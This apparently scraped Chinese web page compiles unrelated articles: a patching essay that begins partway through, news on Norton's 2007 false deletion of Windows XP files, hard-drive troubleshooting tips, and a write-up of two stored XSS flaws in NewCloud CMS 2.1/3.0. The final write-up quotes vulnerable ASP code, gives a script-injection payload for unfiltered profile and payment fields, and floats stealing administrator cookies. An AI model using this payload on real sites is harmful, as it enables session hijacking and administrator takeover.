由于“冲击波”和“震荡波”的“贡献”，现在及时打补丁已经成为一个常识了。但系统补丁和病毒定义码一样，有一个是否一定适合在你的系统的问题。只不过系统补丁在发布前，比病毒定义码有更多的时间进行测试，这样补丁能保证尽可能和操作系统不冲突，但却很难保证和系统里所有的软件都不冲突。所以，重要系统在部署补丁前也应该先进行兼容性和安全性的测试。

四是对安全厂商的看法

幻想用了某杀毒软件或应用某项安全保障体系就能“高枕无忧”的想法是不切实际的。要明白，安全厂商的目标是利润。与安全厂商的关系应该是合作，而不是依赖。

诺顿“误杀”关键系统文件的三维反思

作者：坊间佳平　来源：赛迪网

近日，赛门铁克公司诺顿杀毒软件升级病毒库后，把Windows XP系统的关键系统文件误当作病毒清除，造成使用该杀毒软件的国内数百万台个人和企业用户电脑系统崩溃，正常工作和商业活动受到严重影响。诺顿“误杀”事件，确实有点“倒洗澡水，把婴儿一并倒掉”的味道。透过这起事件，不仅当事公司——赛门铁克公司，而且我们的杀毒软件行业、用户都应无一例外地都要引起深刻反思，以免重蹈覆辙。

诺顿杀毒软件此次升级病毒库的主要目的是对付一种可怕的病毒——“哈克斯”。“哈克斯”一种目前流行于互联网的病毒，其变种数量和危害性极大。诺顿杀毒软件试图升级病毒库的良好初衷可以理解，但需要反思的是，当事公司在设计杀毒软件之时是否过于匆忙，把杀毒的时效性看得比实效性、严谨性更重，是否存在“宁可错杀一千，也不放过一个”病毒的看似完善的追求而忽视了细节的完善，是否把经济利益、市场份额等看得比用户的安全更重。如果赛门铁克公司没有这些认识的误区，相信不会发生“误杀”事件。事件发生后，赛门铁克公司的应急处理并不尽如人意，“误杀”事件发生后，赛门铁克公司没有在极短的时间内给用户一个正式说法和解决方案，而且有不少用户抱怨，致电该公司无人工接听，语音电话也一直是音乐声音，长时间内没有人接听，导致难以沟通。

诺顿“误杀”事件表面上看，是赛门铁克公司的个案，实际上这个事件处理不好，造成的是公众对整个杀毒软件行业的信任危机。本来公众对于杀毒软件行业就或多或少地存在着“杀毒者制毒”或者“病毒，杀毒者造”的不良看法，这次“误杀”事件正好提供一个很好的事实佐证。而且，事实上，这起事件的事故已经波及到国内外众多反病毒软件厂商，瑞星、江民科技、卡巴斯基都受到不同程度的牵连。因而，我们的整个杀毒软件行业都应理性对待，切不可有着事不关己、高高挂起的不良心态，否则伤及自身。有鉴于此，除当事公司之外的杀毒软件公司应该对照诺顿“误杀”事件反思自己公司的经营理念、安全理念和杀毒软件设计理念，同时，检视自己公司危机的处理能力，以防出现事故后能够及时处理。另外，从杀毒软件行业管理的角度看，如何加强管理是值得思考的问题。能否在国家或行业层面，建立一个杀毒软件准入机制呢？任何杀毒软件正式进入市场之前都必须经过特定机构的审查。诺顿“误杀”事件发生的原因，很大程度上就在于这种审查或准入机制的缺失。

最后，需要反思的是我们用户自己。在选用杀毒软件的过程中，国内用户普遍存在着国外的比国内的技术强、服务好这种认识误区。这当然需要国内杀毒软件提高竞争力和公信力，但也需要用户逐渐改变这种认识，建立起对国内杀毒软件的信任感。这起“误杀”事件的确认就是江民科技公司首先发现的，而且在处理事件之时，江民、瑞星、金山毒霸等国内杀毒软件公司及时提供了有效解决方案。与国外公司对国内用户的傲慢与偏见相比，国内杀毒软件公司的热情服务与技术优势无疑能够获得用户的好感与信任。期待国内用户，能够在诺顿“误杀”事件中摒弃种种认识误区，根据自己的需求理性地选择合适、安全的杀毒软件。

赛门铁克官方首次公开向用户正式道歉

出处：搜狐数码 |

　　赛门铁克于5月23日下午在北京召开新闻发布会，赛门铁克公司安全响应中心高级发展总监Vincent Weafer先生就诺顿误杀XP系统文件事件的最新进展与媒体进行沟通。

　　在新闻发布会上，赛门铁克官方首次公开向用户正式道歉，并表示对该事件的发生感到非常遗憾。

　　赛门铁克还表示，目前的工作重点还是帮助客户恢复他们的系统，恢复他们的业务。现在正在不断的研发，以后有一些更有效的工具帮助客户恢复系统，在技术方面也在调动全球的资源提供服务。如果有其他客户的要求和意见，将先记录下来以后会做出回应。

微软建议XP被误删用户参照诺顿官方解决方案

作者：马全智 | 出处：新浪科技 |

　　新浪科技讯 5月23日中午消息，“诺顿误杀致中文WinXP崩溃”风波进入第六天，新浪科技从微软方面获悉，微软的态度是“建议相关用户参照赛门铁克公司关于此事的建议与指导”。据悉，这是微软方面对此的首次表态。

　　5月18日下午，国内信息安全商瑞星发出红色警报，称诺顿杀毒软件升级最新的病毒库后，会把Windows XP的关键系统文件当作病毒清除，重启后系统将会瘫痪。该次误杀只发生在简体中文版的XP系统上，对国外用户几乎没有影响。

　　问题出现后，赛门铁克先后发布了三份公告。第一份公告是在19日下午，赛门铁克确认软件误删除XP系统文件；21日上午，该公司发布第二份公告称，调查发现此次错误是由“自动化系统”所引起的；21日下午，该公司的第三份公告解释，为何会出现此类事件以及今后如何避免等问题。

　　据悉，这三份公告均没有正面向用户道歉，也没有提出补偿的措施。对于企业和用户关心较多的，如果解决此问题，以及善后和赔偿问题，只字未提。据媒体报道称，已经有部分企业用户向赛门铁克提出了索赔的请求。

　　新浪科技设法从微软方面获悉，微软总部已关注到此事，不过目前对于此事的官方态度是如上文所述。至于外界所关心的“微软是否与赛门铁克有过沟通”、“微软是否会协助用户向赛门铁克索赔”等问题，暂没有回应。

　　最新消息显示，赛门铁克将于23日下午2点首次与中国媒体面对面，通报有关误杀事件的最新进展，并接受媒体采访。新浪科技将全程直播此次媒体沟通会。(马全智)

赛门铁克首度松口 将考虑赔偿问题

作者：李广盛 |

　　新浪科技讯 5月23日14:31消息，赛门铁克今日就诺顿误杀WinXP系统文件事件召开媒体答问会，在回答新浪科技关于如何赔偿用户损失的提问时，赛门铁克高层表示本周工作主要是帮助用户恢复电脑的正常使用，其他(赔偿)的问题随后再考虑。

　　上周五，由于诺顿杀毒软件误将WindowsXP两个系统文件当成病毒查杀，给部分企业及用户造成了极大损失，据悉，已有部分企业用户向赛门铁克软件(北京)索赔，索赔金额从十多万元到几百万元不等。

　　赛门铁克在事发后不久便公布了关于此次误杀事件的解决方案，并向用户表示致歉，但一直未就赔偿问题做出表态。(李广盛)

江民:国外杀毒软件身陷误杀门 国产杀毒软件免费救场

近日,关于国外杀毒软件误杀的报道频频见诸报端.首先是美国的杀毒品牌诺顿,将Windows XP的关键系统文件误当作病毒清除,给用户带来了严重的损失,系统崩溃、重要资料丢失、业务无法开展等等,严重干扰了企事业单位工作的正常开展,同时也使得这部分企业用户面临着更大的病毒威胁.

　　为了有效地帮助被误杀的企业及个人用户尽快恢复系统,防止病毒的大规模入侵,5月23日,江民科技宣布,即日起面向全国开展《江民安全中国行》大规模企业网络安全救援活动,实施两大举措保护我国企业级用户的网络和信息安全:

一、江民杀毒软件KV网络版免费使用一个月.从即日起到2007年12月31日,任何企业用户只需通过网上或电话提交申请,都可在江民公司总部及各办事处所在城市,享受到免费的上门杀毒服务,同时还可以免费使用江民KV网络版杀毒软件1个月.

　　二、为国外品牌杀毒软件企业用户特惠更换产品:活动期间,对所有国外产品老用户提供优惠升级服务,将《江民杀毒软件KV网络版》以现行市场价的 20%提供给企业用户,并提供2年免费升级服务(SOHO版按照市场价格的40%,提供1年免费升级服务);渠道代理商独立完成的项目,享受升级费的5折优惠.

　　按照江民提供的价格计算,企业用户如果需要安装一套100个客户端的网络版杀毒软件,原价需要28300元,在活动期间只需要5660元,价格优惠幅度达到80%!

　　江民科技总裁陶新宇介绍,随着近年来互联网安全环境的日益严峻,缺乏本土化服务的国外防

病毒产品也日渐暴露出其本土化服务的先天不足, 2006年年底的海底光缆断裂事件,使得国外杀毒软件不能正常升级,在面临同期发作的“

熊猫烧香”时,许多无法升级的国内用户顿时手足无措,造成了严重的经济损失.而以江民科技为代表的国产杀毒软件厂商,在经过10多年的沉淀和积累后,已经拥有了雄厚的技术和服务实力,特别是在本土化的应急响应上,更是国外杀毒厂商无法比拟的.目前国产杀毒软件已经拥有了满足高端行业用户到个人消费者全线产品和技术,完全可以担当捍卫我国重点行业和部门的网络和信息安全防护重任.

　　业内人士分析认为,长期以来,我国重点行业部门的信息安全防护重任一直由国外杀毒软件担当,此次诺顿严重误杀事件使得许多国家机关、金融、事业等重点行业、单位受到严重影响,这也将把如何更加有效保障国家重点部门信息安全的议题再一次提上相关部门的议事日程,而在这方面本土杀毒厂商应当责无傍贷地担当起重任,在技术、产品、服务各方面对自己提出更高的要求,从而避免此类误杀事件的再度重演.

让硬盘摆脱五大怪异的骚扰

读取硬盘中的信息或写入数据到硬盘中，几乎是我们每天要做的“必修课”。可是在频繁访问硬盘的过程中，我们时不时地会发现一些怪异的“骚扰”袭向硬盘，在这些怪异“骚扰”面前，不少朋友常常表现得一筹莫展，很显然这样会严重影响硬盘的高效工作效率。为此，本文下面就将一些非常容易碰到的怪异“骚扰”现象总结出来，并为每一“骚扰”把脉问药，以达到提高硬盘工作效率的目的!

　　1、硬盘空间奇怪变小

　　最近朋友在他的计算机中重新安装了一遍Windows XP操作系统，安装完毕后他查看了硬盘C分区中的剩余空间，发现大约有65%的余量，可是过了一段时间后他再次查看硬盘C分区中的剩余空间时，发现只有50%不到的余量了，而且他确信在这一段时间中并没有往硬盘C分区中保存任何文件，那硬盘空间为什么会突然变小呢?我们能否找回消失的磁盘分区空间呢?

　　尽管朋友没有往硬盘C分区中保存任何文件，但Windows XP操作系统在长时间运行过程中，会产生容量不小的日志文件或者临时文件，正是这些长期积累下来的垃圾文件在“悄悄”地蚕食着硬盘C分区的空间。这些垃圾文件一般会自动保存在硬盘C分区的“Windows\temp”文件夹中和“Documents and Settings\用户帐号名\Local Settings\Temp”文件夹中，由于它们没有多大实际用途，我们可以定期地进入到这些文件夹窗口中，将它们及时删除掉，以便将它们占用的磁盘空间释放出来。当然，我们要是经常使用IE浏览器进行上网浏览信息时，IE也会把我们以前访问过的网页内容缓存到硬盘C分区中，这部分内容消耗的磁盘分区空间有时也是不小的数目，为此我们可以定期到“Documents and Settings\用户帐号名\Local Settings\Temporary Internet Files”文件夹窗口中将这部分垃圾内容删除掉。倘若我们已经对Windows XP操作系统进行过升级操作，那么我们还会在“Windows”文件夹窗口中看到类似“$NTUninstallK***$”这样的系统备份文件夹，一旦我们将系统还原功能启用起来的话，那么该备份文件夹也会导致硬盘C分区的空间逐步变小。

　　2、无法双击进入硬盘

　　有一台计算机安装的是Windows XP操作系统，该系统中的硬盘总共被分成了C、D、E、F四个分区，以前我们只要用双击分区图标的方法就能进入到对应的硬盘分区空间。可是最近不知道怎么回事，用鼠标双击C分区图标时，始终无法打开C盘分区窗口，只有用鼠标右键单击该分区图标，并执行右键菜单中的“打开”命令才能顺利进入到C盘窗口，而且我们在右键菜单中还看到了“自动播放”这一命令选项。面对这种无法双击进入硬盘空间的怪异“骚扰”，我们该如何进行应对呢?

　　考虑到用鼠标右键单击C分区图标时，系统右键菜单中出现了“自动播放”这一命令选项，因此我们断定C盘分区下面保存有“autorun.inf”这样的文件，正是该文件的存在才导致了我们无法通过双击鼠标的方法进入到C盘根目录窗口，我们只要先用单击鼠标右键的方法进入到该分区窗口，将其中的“autorun.inf”文件删除掉，并且将与“autorun.inf”文件相关的程序全部删除干净，之后我们就能通过双击鼠标的方法重新进入到C盘根目录窗口了。

　当然，“autorun.inf”文件一般都属于系统隐藏文件，在默认状态下我们往往无法看到它的“身影”，更不用说将它从硬盘中删除掉了;此时，我们可以在“我的电脑”窗口中，依次单击菜单栏中的“工具”/“文件夹选项”命令，在弹出的文件夹选项设置窗口中，单击“查看”标签，打开如图1所示的标签页面，选中该页面中的“显示所有文件和文件夹”项目，再单击“确定”按钮，这么一来我们再次进入到C盘根目录窗口时就能看到“autorun.inf”文件的“身影”了。

　　3、无法删除硬盘文件

　　有一朋友在尝试删除硬盘中的AVP格式的文件时，发现该类型的文件无法被删除，而且在删除该文件的时候，系统还会弹出“删除文件出错，访问被拒绝请确定磁盘未满或未被写保护”这样的错误提示。不过，当将系统切换到安全模式状态时，朋友发现AVP格式的文件被删除掉，面对这种硬盘访问怪异现象，我们该如何进行解决呢?

　　其实遇到这种硬盘访问怪异现象时，我们可以再尝试删除其他类型的普通文件，看看系统能否弹出“删除文件出错，访问被拒绝请确定磁盘未满或未被写保护”这样的错误提示，如果没有这样的提示那就说明了当前待删除的AVP文件目前正在运行之中。事实上，AVP文件其实就是杀毒软件卡巴斯基的相关程序文件，在默认状态下，卡巴斯基杀毒程序往往处于监视病毒的运行状态，在这种状态下删除任何与该杀毒程序有关的文件时，系统都会弹出“删除文件出错，访问被拒绝请确定磁盘未满或未被写保护”这样的错误提示。而我们将系统切换到安全模式状态下时，之所以能够将AVP格式的文件正常删除掉，是因为在系统安全模式下，卡巴斯基杀毒程序往往不会随系统自动加载，这么一来没有被掉用的AVP文件就和普通文件一样，任人随意删除了。

　　　4、硬盘检测无法通过

　　单位办公室中的某一台共用计算机每次开机启动时，都要自动进行硬盘检测，可是在检测进度位于66%位置处时检测操作就无法进行下去了，此时也不能使用热启动功能来重新启动系统，必须关闭电源进行冷启动。现在只能在系统启动画面提示检测硬盘的那一刻，及时按下键盘上的任意键来忽略硬盘检测操作，之后登录进Windows系统界面后执行任何操作都很正常。那为什么系统在对硬盘进行检测操作时，硬盘检测无法顺利通过呢?会不会是硬盘发生了硬件损伤呢?

　　从上面的现象描述来看，我们估计单位共用计算机的硬盘有可能发生了硬件损坏，遇到这种现象时我们首先要做的就是赶快将硬盘中的重要数据内容，挪移到其他相对安全的位置处。在做好数据的备份工作后，我们接下来要做的工作就是将系统切换到DOS运行状态，并在DOS命令行中执行“fdisk /mbr”字符串命令，来尝试修复硬盘中发生的软故障;要是这种修复方法尝试无效的话，我们可以到网上下载安装一些专业的硬盘坏道检测工具，来仔细检查本地硬盘中是否存在坏道现象，如果找不到硬盘坏道的话，那硬盘检测无法通过的现象很可能是逻辑故障引起的，此时我们唯一可以使用的办法就是找到对应品牌硬盘的逻辑坏道修复工具来重新修复一下硬盘，相信这么一来硬盘检测无法通过现象就能被解决了。

　　5、待机时硬盘无法休息

　　有一计算机处于待机状态时，其硬盘信号灯仍然处于狂闪状态，我们知道硬盘信号灯要是每天都这样狂闪不停的话，硬盘的使用寿命很有可能被大大缩短。那么我们有什么办法让硬盘在系统处于待机状态时，也能得到充分的“休息”呢?其实引起硬盘信号灯在系统待机状态下仍然狂闪的因素有很多，我们可以按照如下步骤进行逐一排查，就能确保硬盘及时得到“休息”了：

　　首先检查一下本地计算机系统中是否安装了一些专业的磁盘整理程序，要是已经安装的话，可以将它们从本地系统中卸载掉，因为这些专业磁盘整理软件一般都具有在系统待机状态下自动对磁盘碎片进行整理的功能，如此一来在那些专业磁盘整理程序会“强迫”硬盘在待机状态下去执行磁盘碎片整理操作的。当然，我们也可以不卸载这些专业的磁盘整理程序，但必须进入到它的设置界面中，将磁盘碎片自动整理功能暂时屏蔽掉，这样的话硬盘在待机状态下就不会被“强迫”去执行磁盘碎片整理操作了，如此一来也就能得到足够的“休息”时间了。

其次检查一下本地系统是否安装了类似江民、金山以及瑞星这样的国产杀毒软件，这些杀毒软件都喜欢在系统处于待机状态时对硬盘中的文件执行扫描、查杀操作，那样的话硬盘自然就无法得到足够的休息时间了。一旦发现系统中安装了上述杀毒软件时，我们必须进入到对应的程序设置界面，将对应的自动查杀功能暂时关闭掉。比方说，本地系统要是安装了瑞星杀毒软件时，那我们可以在该杀毒程序界面中依次执行“设置”/“详细设置”菜单命令，在其后弹出的设置窗口中单击“定制任务”标签，打开如图2所示的标签页面;在该界面的右侧区域，将“使用定时扫描”、“关机时检测软盘”、“使用开机扫描”以及“使用屏保杀毒”等复选项的选中状态全部取消掉，并单击“确定”按钮，这样杀毒软件日后在系统处于待机状态时，不会自动“强迫”硬盘去不停地工作了。

　　接下来检查一下本地系统的“Indexing Service”服务有没有被开启，一旦该服务被开起的话，那么该服务会在系统处于空闲状态的时候，对保存在硬盘中的数据文件自动执行索引操作了，那么空闲时的硬盘到时也只能跟着一起“倒霉”了。因此，当我们发现“Indexing Service”服务已经运行了的话，我们可以打开系统的服务列表窗口，双击其中的“Indexing Service”项目，在其后出现的属性设置窗口中单击“停止”按钮，并将启动类型设置为“手动”，再单击“确定”按钮就可以了。

　　除此而外，我们最好将安装在本地系统中的的桌面搜索工具、内存优化工具等全部从系统中卸载掉，因为这些工具也会让硬盘无法“休息”的。

解析新云2.1&3.0的两个跨站

解析新云2.1&3.0的两个跨站

文章作者:神無月
信息来源:www.wolfexp.net
还是老规矩 直接来吧 因为早上去下3.0下不了 所以图是2.1时候截的 不过后来下了3.0 还是有洞
漏洞文件1:user/changeinfo.asp

＜!--#include file="config.asp"--＞
＜!--#include file="check.asp"--＞
＜!--#include file="../inc/md5.asp"--＞
＜!--#include file="../inc/chkinput.asp"--＞
＜!--#include file="../api/cls_api.asp"--＞
＜!--#include file="head.inc"--＞
================省略部分代码==============================================
＜%
End If
Rs.Close:Set Rs = Nothing
End If
If Founderr = True Then
Call Returnerr(ErrMsg)
End If
Sub ChangeUserInfo()
On Error Resume Next
Dim username, password,userid
Dim usersex,sex
username = Newasp.CheckBadstr(Newasp.membername)
userid = Newasp.ChkNumeric(memberid)
If Newasp.CheckPost=False Then
ErrMsg = ErrMsg + Postmsg
FoundErr = True
Exit Sub
End If
If Newasp.IsValidPassword(Request.Form("answer")) = False And Trim(Request.Form("answer")) ＜＞ "" Then
ErrMsg = ErrMsg + "＜li＞密码问题答案中含有非法字符！＜/li＞"
Founderr = True
End If
If Trim(Request.Form("username")) ＜＞ username Then
ErrMsg = ErrMsg + "＜li＞非法操作！＜/li＞"
Founderr = True
End If
If Trim(Request.Form("password")) = "" Then
ErrMsg = ErrMsg + "＜li＞请输入用户密码！＜/li＞"
Founderr = True
Else
password = md5(Request.Form("password"))
End If
If userid = 0 Then
FoundErr = True
ErrMsg = ErrMsg + "＜li＞Sorry！您选择了错误的系统参数。＜/li＞"
Exit Sub
End If

If Trim(Request.Form("nickname")) = "" Then
ErrMsg = ErrMsg + "＜li＞用户昵称不能为空！＜/li＞"
Founderr = True
End If
If Newasp.IsValidStr(Request.Form("nickname")) = False Then
ErrMsg = ErrMsg + "＜li＞用户昵称中含有非法字符！＜/li＞"
Founderr = True
End If
If Trim(Request.Form("TrueName")) = "" Then
ErrMsg = ErrMsg + "＜li＞真实姓名不能为空！＜/li＞"
Founderr = True
End If
If Newasp.IsValidStr(Request.Form("TrueName")) = False Then
ErrMsg = ErrMsg + "＜li＞真实姓名中含有非法字符！＜/li＞"
Founderr = True
End If
If Trim(Request.Form("usermail")) = "" Then
ErrMsg = ErrMsg + "＜li＞您的Email不能为空！＜/li＞"
Founderr = True
End If
If IsValidEmail(Request.Form("usermail")) = False Then
ErrMsg = ErrMsg + "＜li＞您的Email有错误！＜/li＞"
Founderr = True
End If
If Not IsNumeric(Request.Form("oicq")) And Trim(Request.Form("oicq")) ＜＞ "" Then
FoundErr = True
ErrMsg = ErrMsg + "＜li＞QQ号码请用数字填写。＜/li＞"
End If
If Trim(Request.Form("HomePage")) ＜＞ "" And Left(Request.Form("HomePage"),7) ＜＞ "http://" Then
FoundErr = True
ErrMsg = ErrMsg + "＜li＞个人主页地址输入有误，请以“http://”开头。＜/li＞"
End If
If Not Newasp.CodeIsTrue() Then
ErrMsg = ErrMsg + "＜meta http-equiv=""refresh"" content=""2;URL=changeinfo.asp""＞＜li＞验证码校验失败，请返回刷新页面再试。两秒后自动返回＜/li＞"
Session("GetCode") = ""
Founderr = True
Exit Sub
End If
Session("GetCode") = ""
If Trim(Request.Form("usersex")) = "" Then
ErrMsg = ErrMsg + "＜li＞您的姓别不能为空！＜/li＞"
Founderr = True
Else
usersex = Newasp.CheckBadstr(Request.Form("usersex"))
End If
If usersex = "女" Then
sex = 0
Else
sex = 1
End If

If Founderr = True Then Exit Sub
Set Rs = Server.CreateObject("ADODB.RecordSet")
SQL = "SELECT * FROM [NC_user] WHERE username='" & username & "' And userid=" & CLng(userid)
Rs.Open SQL, Conn, 1, 3
If Rs.bof And Rs.EOF Then
ErrMsg = ErrMsg + "＜li＞Sorry！没有找到此用户信息信息！＜/li＞"
Founderr = True
Exit Sub
Else
If password ＜＞ Rs("password") Then
ErrMsg = ErrMsg + "＜li＞您输入的密码错误！＜/li＞"
Founderr = True
Exit Sub
End If
If Founderr = False Then
'-----------------------------------------------------------------
'系统整合
'-----------------------------------------------------------------
Dim API_Newasp,API_SaveCookie,SysKey
If API_Enable Then
Set API_Newasp = New API_Conformity
API_Newasp.NodeValue "action","update",0,False
API_Newasp.NodeValue "username",UserName,1,False
Md5OLD = 1
SysKey = Md5(API_Newasp.XmlNode("username") & API_ConformKey)
Md5OLD = 0
API_Newasp.NodeValue "syskey",SysKey,0,False
API_Newasp.NodeValue "password","",1,False
API_Newasp.NodeValue "answer",Request.Form("answer"),1,False
API_Newasp.NodeValue "question",Request.Form("question"),1,False
API_Newasp.NodeValue "email",Request.Form("usermail"),1,False
API_Newasp.NodeValue "gender",sex,0,False
API_Newasp.SendHttpData
If API_Newasp.Status = "1" Then
Founderr = True
ErrMsg = API_Newasp.Message
Exit Sub
End If
Set API_Newasp = Nothing
End If
'-----------------------------------------------------------------
End If
Rs("nickname") = Newasp.CheckBadstr(Request.Form("nickname"))
Rs("TrueName") = Newasp.CheckBadstr(Request.Form("TrueName"))
Rs("usermail") = Trim(Request.Form("usermail"))
If Trim(Request.Form("HomePage")) ＜＞ "" Then Rs("HomePage") = Trim(Request.Form("HomePage"))
If Trim(Request.Form("usersex")) ＜＞ "" Then Rs("usersex") = usersex
If Trim(Request.Form("question")) ＜＞ "" Then Rs("question") = Trim(Request.Form("question"))
If Trim(Request.Form("answer")) ＜＞ "" Then Rs("answer") = md5(Trim(Request.Form("answer")))
If Trim(Request.Form("phone")) ＜＞ "" Then Rs("phone") = Trim(Request.Form("phone"))
If Trim(Request.Form("oicq")) ＜＞ "" Then Rs("oicq") = Trim(Request.Form("oicq"))
If Trim(Request.Form("postcode")) ＜＞ "" Then Rs("postcode") = Trim(Request.Form("postcode"))
If Trim(Request.Form("UserIDCard")) ＜＞ "" Then Rs("UserIDCard") = Trim(Request.Form("UserIDCard"))
If Trim(Request.Form("address")) ＜＞ "" Then Rs("address") = Trim(Request.Form("address"))
If Trim(Request.Form("BuyCode")) ＜＞ "" Then Rs("BuyCode") = md5(Trim(Request.Form("BuyCode")))
Rs.Update
End If
Rs.Close
Set Rs = Nothing
Call Returnsuc("＜li＞恭喜您！用户资料修改成功。＜/li＞")
End Sub
%＞
＜!--#include file="foot.inc"--＞

nickname跟Truename被checkbadstr函数过滤了

函数代码 inc/cls_main.asp

Public Function CheckBadstr(str)
If IsNull(str) Then
CheckBadstr = vbNullString
Exit Function
End If
str = Replace(str, Chr(0), vbNullString)
str = Replace(str, Chr(34), vbNullString)
str = Replace(str, "%", vbNullString)
str = Replace(str, "@", vbNullString)
str = Replace(str, "!", vbNullString)
str = Replace(str, "^", vbNullString)
str = Replace(str, "=", vbNullString)
str = Replace(str, "--", vbNullString)
str = Replace(str, "$", vbNullString)
str = Replace(str, "'", vbNullString)
str = Replace(str, ";", vbNullString)
CheckBadstr = Trim(str)
End Function

过滤了单引双引 没过滤＜＞ 开始本来以为可以跨 可是后来进后台才发现需要用'＞闭合前面的代码 所以

就放弃了 有人能过告诉我

usermail就被IsValidEmail函数过滤了 还蛮严格的 只能输入英文+数字还有_-.几个字符

函数代码 inc/chkinput.asp

Function IsValidEmail(email)
Dim names, Name, i, c
IsValidEmail = true
names = Split(email, "@")
If UBound(names) ＜＞ 1 Then
IsValidEmail = false
Exit Function
End If
For Each Name in names
If Len(Name) ＜= 0 Then
IsValidEmail = false
Exit Function
End If
For i = 1 To Len(Name)
c = LCase(Mid(Name, i, 1))
If InStr("abcdefghijklmnopqrstuvwxyz_-.", c) ＜= 0 And Not IsNumeric(c) Then
IsValidEmail = false
Exit Function
End If
Next
If Left(Name, 1) = "." Or Right(Name, 1) = "." Then
IsValidEmail = false
Exit Function
End If
Next
If InStr(names(1), ".") ＜= 0 Then
IsValidEmail = false
Exit Function
End If
i = Len(names(1)) - InStrRev(names(1), ".")
If i ＜＞ 2 And i ＜＞ 3 Then
IsValidEmail = false
Exit Function
End If
If InStr(email, "..") ＞ 0 Then
IsValidEmail = false
End If

End Function

usersex跟name那情况差不多 也放弃

question的没有过滤就进库了 直接'＞＜script＞alert('test')＜/script＞＜ 就可以跨了

answer经过MD5加密 放弃咯

phone跟question 也是一样

下面的postcode,UserIDCard,address也是没过滤 BuyCode就被MD5了

还是很好跨的. 我就直接用address直接跨测试下咯 看图

漏洞文件2:user/confirm.asp

====================省略部分代码================================

＜table cellspacing=1 align=center cellpadding=3 border=0 class=Usertableborder＞
＜tr height=20＞
＜th colspan=2＞交费确认＜/th＞
＜/tr＞
＜tr height=20 align=center＞
＜td class=Usertablerow2 colspan=2＞＜font color=red＞注意：＜/font＞＜font color=blue＞请一定要正确填写以下含*的选项，以方便我们核对！＜/font＞＜/td＞
＜/tr＞
＜form name=form2 method=post action=?action=save＞
＜tr height=20＞
＜td class=Usertablerow1 width="20%" align=right＞汇款日期：＜/td＞
＜td class=Usertablerow1 width="80%"＞＜input type="text" name="PayDate" size=15 value="＜%=date()%＞"＞ ＜font color=red＞*＜/font＞＜/td＞
＜/tr＞
＜tr height=20＞
＜td class=Usertablerow1 align=right＞汇款金额：＜/td＞
＜td class=Usertablerow1＞＜input type="text" name="PayMoney" size=15 onkeyup=if(isNaN(this.value))this.value=''＞ 元 ＜font color=red＞*＜/font＞＜/td＞
＜/tr＞
＜tr height=20＞
＜td class=Usertablerow1 align=right＞定 单 号：＜/td＞
＜td class=Usertablerow1＞＜input type="text" name="indent" size=30＞ ＜font color=red＞*＜/font＞＜/td＞
＜/tr＞
＜tr height=20＞
＜td class=Usertablerow1 align=right＞汇款方式：＜/td＞
＜td class=Usertablerow1＞
＜input type=radio name=paymode value="银行汇款" checked＞ 电汇
＜input type=radio name=paymode value="邮局汇款"＞ 邮汇
＜input type=radio name=paymode value="网上支付"＞ 网上支付
＜/td＞
＜/tr＞
＜tr height=20＞
＜td class=Usertablerow1 align=right＞用户名：＜/td＞
＜td class=Usertablerow1＞＜input type="text" name="username" size=15 value="＜%=Newasp.MemberName%＞"＞ ＜font color=red＞*＜/font＞＜/td＞
＜/tr＞
＜tr height=20＞
＜td class=Usertablerow1 align=right＞汇款人名称：＜/td＞
＜td class=Usertablerow1＞＜input type="text" name="customer" size=30＞ ＜font color=red＞*＜/font＞＜/td＞
＜/tr＞
＜tr height=20＞
＜td class=Usertablerow1 align=right＞汇款人邮箱：＜/td＞
＜td class=Usertablerow1＞＜input type="text" name="Email" size=30＞ ＜font color=red＞*＜/font＞＜/td＞
＜/tr＞
＜tr height=20＞
＜td class=Usertablerow1 align=right＞其它说明：＜/td＞
＜td class=Usertablerow1＞＜textarea name=readme rows=5 cols=50＞＜/textarea＞ ＜font color=red＞*＜/font＞＜/td＞
＜/tr＞
＜tr height=20 align=center＞
＜td class=Usertablerow2 colspan=2＞＜input type=submit value=" 确认提交 " class=Button＞＜/td＞
＜/tr＞
＜/form＞
＜%
Response.Write "＜/table＞"
End Sub
Sub SaveConfirm()
If Newasp.CheckPost=False Then
ErrMsg = ErrMsg + Postmsg
FoundErr = True
Exit Sub
End If
If Not IsDate(Request.Form("PayDate")) Then
FoundErr = True
ErrMsg = ErrMsg + "＜li＞日期输入错误。＜/li＞"
End If
If Not IsNumeric(Request.Form("PayMoney")) Then
FoundErr = True
ErrMsg = ErrMsg + "＜li＞汇款金额输入错误。＜/li＞"
End If
If Trim(Request.Form("indent")) = "" Then
FoundErr = True
ErrMsg = ErrMsg + "＜li＞你的定单号没有填咧？＜/li＞"
End If
If IsValidEmail(Request.Form("Email")) = False Then
ErrMsg = ErrMsg + "＜li＞您的Email有错误！＜/li＞"
Founderr = True
End If
If Trim(Request.Form("customer")) = "" Then
FoundErr = True
ErrMsg = ErrMsg + "＜li＞汇款人名称不能为空。＜/li＞"
End If
If Trim(Request.Form("username")) = "" Then
FoundErr = True
ErrMsg = ErrMsg + "＜li＞用户名不能为空？＜/li＞"
End If
If Founderr = True Then Exit Sub
Set Rs = Server.CreateObject("ADODB.Recordset")
SQL = "select * from NC_Confirm where (id is null)"
Rs.Open SQL,Conn,1,3
Rs.Addnew
Rs("paymode").Value = Trim(Request.Form("paymode"))
Rs("PayDate").Value = Trim(Request.Form("PayDate"))
Rs("PayMoney").Value = Trim(Request.Form("PayMoney"))
Rs("indent").Value = Left(Newasp.ChkFormStr(Request.Form("indent")),35)
Rs("Email").Value = Trim(Request.Form("Email"))
Rs("customer").Value = Left(Newasp.ChkFormStr(Request.Form("customer")),30)
Rs("username").Value = Left(Newasp.ChkFormStr(Request.Form("username")),30)
Rs("readme").Value = Left(Newasp.ChkFormStr(Request.Form("readme")),200)
Rs("isPass").Value = 0
Rs.Update
Rs.close:set Rs = Nothing
Call Returnsuc("＜li＞恭喜您！确认信息提交成功，我们会在一个工作日内处理你的定单。")
End Sub

%＞
＜!--#include file="foot.inc"--＞

还是以前的过滤函数 不过就paymode没有过滤 因为它类型是radio 单选项 本来以为把它保存到本地修改一下类型就可以了

但是新云有防止本地提交 所以就只能抓包了 过程也不说怎么说 2.1没有验证码直接就抓包跨了可是3.0我加了验证码还是显示我错误

刷新N次也不行 不知道什么原因 官方倒是不会显示我验证码错误 也成功弹出(我去问官方官方告诉我的^_^)本机就出错了

所以这个跨站我只能在2.0测试这个比个人资料的好 因为个人资料 人家管理员不一定会点你的资料 可是订单的只要点交费确认就直接弹的,需

要点你的那个订单

方便多了 不过这个paymode貌似只限制提交70个字符 不过也够我们调用JS之类的,貌似盗了COOKIE可以直接欺骗后台吧? 呵呵 官方的后台

